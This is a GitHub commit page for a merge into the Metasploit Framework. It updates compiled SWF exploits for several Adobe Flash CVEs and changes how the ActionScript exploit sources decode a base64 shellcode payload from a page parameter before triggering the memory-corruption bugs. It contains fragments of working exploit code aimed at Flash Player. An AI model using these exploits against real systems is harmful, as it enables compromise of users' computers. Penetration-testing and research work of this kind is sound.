Skip to content

Commit 19106a3

Browse files
committed
Merge branch 'master' of git://github.com/rapid7/metasploit-framework
2 parents 7a566ef + e749733 commit 19106a3

File tree

37 files changed

+1408
-327
lines changed

37 files changed

+1408
-327
lines changed

data/exploits/CVE-2014-0556/msf.swf

-30 Bytes
Binary file not shown.

data/exploits/CVE-2014-0569/msf.swf

88 Bytes
Binary file not shown.

data/exploits/CVE-2014-8440/msf.swf

7 Bytes
Binary file not shown.

data/exploits/CVE-2015-0311/msf.swf

100755100644
2.69 KB
Binary file not shown.

data/exploits/CVE-2015-0313/msf.swf

86 Bytes
Binary file not shown.

data/exploits/CVE-2015-0336/msf.swf

61 Bytes
Binary file not shown.

data/exploits/CVE-2015-0359/msf.swf

127 Bytes
Binary file not shown.

external/source/exploits/CVE-2014-0556/Main.as

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -27,7 +27,10 @@ package
2727
public function Main()
2828
{
2929
var b64:Base64Decoder = new Base64Decoder()
30-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
30+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
31+
var pattern:RegExp = / /g;
32+
b64_payload = b64_payload.replace(pattern, "+")
33+
b64.decode(b64_payload)
3134
var payload:String = b64.toByteArray().toString()
3235

3336
for (i = 0; i < bv.length; i++) {

external/source/exploits/CVE-2014-0569/Main.as

Lines changed: 5 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -32,9 +32,11 @@ package
3232
var i:uint = 0
3333
var j:uint = 0
3434

35-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
36-
payload = b64.toByteArray().toString();
37-
35+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
36+
var pattern:RegExp = / /g;
37+
b64_payload = b64_payload.replace(pattern, "+")
38+
b64.decode(b64_payload)
39+
payload = b64.toByteArray().toString()
3840
for (i = 0; i < defrag.length; i++) {
3941
defrag[i] = new ByteArray()
4042
defrag[i].length = BYTE_ARRAY_SIZE

external/source/exploits/CVE-2014-8440/Msf.as

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -42,8 +42,11 @@ package
4242
this.object_vector_length = 5770 * 2
4343
this.byte_array_vector_length = 510 * 2
4444

45-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
46-
payload = b64.toByteArray().toString();
45+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
46+
var pattern:RegExp = / /g;
47+
b64_payload = b64_payload.replace(pattern, "+")
48+
b64.decode(b64_payload)
49+
payload = b64.toByteArray().toString()
4750

4851
this.initialize_worker_and_ba()
4952
if (!this.trigger())

0 commit comments

Comments
 (0)